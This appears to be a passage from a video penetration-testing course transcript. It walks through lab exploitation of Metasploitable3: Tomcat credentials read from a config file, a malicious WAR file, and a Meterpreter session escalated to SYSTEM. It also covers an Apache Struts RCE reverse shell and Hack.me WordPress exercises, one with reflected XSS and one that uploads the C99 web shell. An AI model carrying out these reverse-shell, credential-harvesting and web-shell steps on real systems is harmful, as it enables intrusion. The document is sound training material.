localhost to the IP address of Kali Linux's host-only interface. Run to start the exploit. Awesome, as you can see here, we have a Meterpreter shell. Let's run a Meterpreter command to create a cmd.exe shell. So type in execute -f cmd.exe -i-h. All right, just run a couple quick commands. Run hostname. All right, run whoami. So as you can see here, we're logged in as Metasploitable3 with the privileges of local service. So we still need system level privileges in order to own this box. Let's go back to the Meterpreter shell by pressing Ctrl and C. Y to terminate the channel. Now, I want to see what kind of services are running locally that may have been missed by Nmap. For this goal, I'll use the netstat command in Meterpreter. So just type in netstat. Go to the top of the results here. I see that Tomcat is running on port 8282. Let's go to a web browser and see if we can access it. So IP address of Metasploitable3 and the port 8282. Okay. Looks like we can access it. Let me see this manager application. Okay. So we need some credentials to utilize the manager application. Let's go back to our limited shell and see if there's any insecure Tomcat configurations that will show us the credentials in their default location. I'm just going to execute another command shell here. All right. So with knowledge of the default Tomcat configuration location, I'm going to change to directory C, change to program files, Apache Software Foundation, change to Tomcat, change to Apache Tomcat, this directory here. Change to the conf directory. Okay, I see a file named tomcatusers.xml. Let's try to print the contents of that file. So type tomcat-users.xml. Okay. See a username and password here, sploit and sploit. Let's go back to the website and see if we can try out these newly acquired credentials. Click Manager App. Try the username sploit and password sploit. Great, we're in. I see right away that there's file upload capabilities. We should be able to upload a malicious WAR file to acquire a remote shell. A web application resource, or WAR file, is commonly used to distribute collections of Java server pages and such, but there's a well-known vulnerability in this version of Tomcat that can be exploited with Metasploit. Let's put that theory to the test. First, we need to generate a malicious payload with MSF Venom. So let's open up a terminal. This command will create a malicious WAR file which will attempt to connect to our Kali Linux VM. Make sure to change the L host to reflect your host-only Kali Linux VM. Once complete, switch back to your web browser. Click Browse. Select your malicious WAR file. Click Deploy. After successfully deploying your WAR file, go to a terminal and set up Metasploit's multi-handler. Type in MSF console. Use exploit multi-handler. Set lhost to the IP address of Kali Linux host only IP address. Set lport. I'm going to set it to 4445. Set payload, same payload that we used when we created the malicious WAR file. It's a Java JSP shell reverse TCP. Started the listener, back to the website. Now let's execute the malicious WAR file. Just click on the location where it was uploaded. As you can see, the exploit was successful. Now we have a remote shell. Let's go ahead and check our privileges. Fantastic! We have system-level privileges. This is just one way to go about hacking Metasploitable 3. I advise that you take your time and figure out all methods of exploitation on your own. In this lab, we'll be setting up a local vulnerable Apache Struts application with Docker, utilizing a standalone exploit to show proof of concept. Apache Struts is an open source web application framework for developing Java EE web applications. There are several critical vulnerabilities which pertain to certain versions of Apache Struts, several of which result in remote code execution. Due to its importance, I wanted to include a hands-on demo of Apache Struts to show its potential. First, we need to download, install, and configure Docker and its dependencies. Then we'll run a quick test to make sure that it's working. Docker is a computer program that performs operating system level virtualization, aka containerization. All of the following commands are included with this lecture under Resources. Alright, after the installation of Docker is complete, let's start the service by typing service docker start. Now let's make sure that everything's working properly by running a hello world command. So just docker run hello-world. Okay, you should see this output after running that command. Now let's run a Docker command to set up the vulnerable Apache Struts instance. For this, we're going to be using port 8080. Once Docker is finished, open up a web browser and let's see if it worked. Localhost, port 8080. Alright, if you see this page here, that means it worked and you now have a vulnerable Apache Struts ready to go. Now let's go back to a terminal and grab an exploit for Apache Struts. Just going to run a git clone command to grab this exploit. What this Python exploit will do is force a web application that's vulnerable to Apache Struts to execute a command. Let's try sending a bash command to attempt to create a reverse shell. Obviously, we're on the same system and we're requesting a reverse shell to our own system, but this is for proof of concept only and would also work on a remote machine the same way. Open up another terminal, set up a netcat listener. I'm going to set it up on port 4446. Alright, so to use this exploit, it's just Python, name of the exploit, URL of the vulnerable Apache Struts web application, and double quotes with the command you wish to execute. In our case, we are executing a bash command to create a network socket back to the IP address of Kali Linux for port 4446. As you can see, it's working properly and the vulnerable Apache Struts web app executed the bash command. Again, although this is just a local exploit on a machine we already have access to, this exercise is geared to inform you of the Apache Struts vulnerability and provide a hands-on demonstration of exploitation. This lab will provide an overview of Hack.me and show you how to get started with it. Hack.me is an open source collection of vulnerable sites that can be utilized anywhere for free, but requires registration. All you need to register is a valid email address. Hack.me is supported by the creators of eLearn Security, which is one of the best cybersecurity training providers I've ever used. At the time of this recording, I've only completed their Web Application Penetration Testing Cert, known as EWPT, but I plan to do their other certifications over the next few years to support my continuing education units for my other certifications. Hack.me is going to be very useful for us because we don't have to set anything up. We can just log in, click Start, and we'll have a vulnerable web application ready for us to hack. To get started, go over to Sign In, Sign Up, enter in whatever information you want here, but you have to have a valid email address. Once registered, log in with your credentials. Then go to the main page. As you can see, there's a bunch of instances called HackMe's, which are created by the cybersecurity community and verified by eLearn Security prior to going public. I highly suggest that you get involved with this project and contribute to it if you're willing and able to. You can also search for HackMe's by name. For example, click Search and search for XSS, which is cross-site scripting. Click Go. There you go. You have all of the ones that are listed by recency for cross-site scripting. This lab will cover 2 of Hack.me's vulnerable WordPress exercises. Instructions on how to sign up for it are in the previous lab. Let's get started. Just click Search, type in WordPress, click Go. I'm going to start on the WordPress Banner Light plugin 1.401 first. So click that. Click Start. Agree with terms of service. All right, so this is our target. I'm just going to copy that. Now let's go to a terminal. Now I'm going to run WP Scan, which is a well-known free WordPress vulnerability scanner. You may need to turn off your antivirus or intrusion prevention systems for this to go through because we're hitting a public website. So type in WP Scan --URL, paste the URL, and remove this index.php. So just all the way up to hack.me. Once the scan has run its course, you can see at the very bottom here, we have the Banners Light 1.4, just as described as the vulnerability for the HackMe. So we also have the exact location where we can exploit this vulnerability and a proof of concept on seclists.org. Let's open that up and take a look. So we should be able to take this and replace localhost with our information and be able to execute a cross-site scripting exploit. Let's give that a shot. So open up another tab. So what I have here is exactly what I just saw on SecLists, but just replacing with the URL for the HackMe. As you can see, the JavaScript was executed on the vulnerable page. Let's move on to another WordPress HackMe. Back to search for WordPress, and let's do this WordPress 3.5 file uploader plugin exercise. So click that and click Start. Agree. Okay, go to default. We have the user and password here. Just going to go back home. Go to login. It's hack me and password. Alright, so let's take a look at this supposedly vulnerable plugin. Here it is, File Uploader. Just click Edit. Alright. So basically what this does is allow us to upload files. So what I want to do is upload a malicious PHP file, the C99 shell. But first we need to create a page that points to this plugin. Let's go over here to readme.txt. Okay, so if we add a square bracket file-upload square bracket, we can create a page that will allow us to upload files. So let's go ahead and do that. Go to Pages, Add New. Just going to add Upload here. And like I just said, bracket file-upload square bracket. Publish. Okay, go to View Page. Here we go. Now let's grab C99 Shell, which is an exploit that allows remote control over vulnerable web servers that allow execution of PHP code. Open another tab. Go to the GitHub page here. It's included in the resources section of this lecture. Go to raw. Just copy that, all the text here. Now let's go to a terminal. Now create a file. I'm going to use V. You can use any text editor. So v c99shell.php. Now I'm going to just paste all that text. Go ahead and save that file. All right, back to the website. Browse to your PHP file. Have mine saved in home, c99shell.php. Click Upload. Ignore this error message. It actually will upload without the email being sent. Going back to plugins and edit plugins for the file uploader.php, I see under process-form.php that the directory that the uploads go into are /uploads. So let's go ahead and visit that directory to see our C99 shell. So in a new tab here on the home page, I'm just going to do /wp content /uploads /c99shell.php. As you can see here, we've successfully launched the C99 shell and have acquired limited access to the web server. That's all we're going to do for WordPress and Hack.me in this course, but I suggest that you continue your research on your own.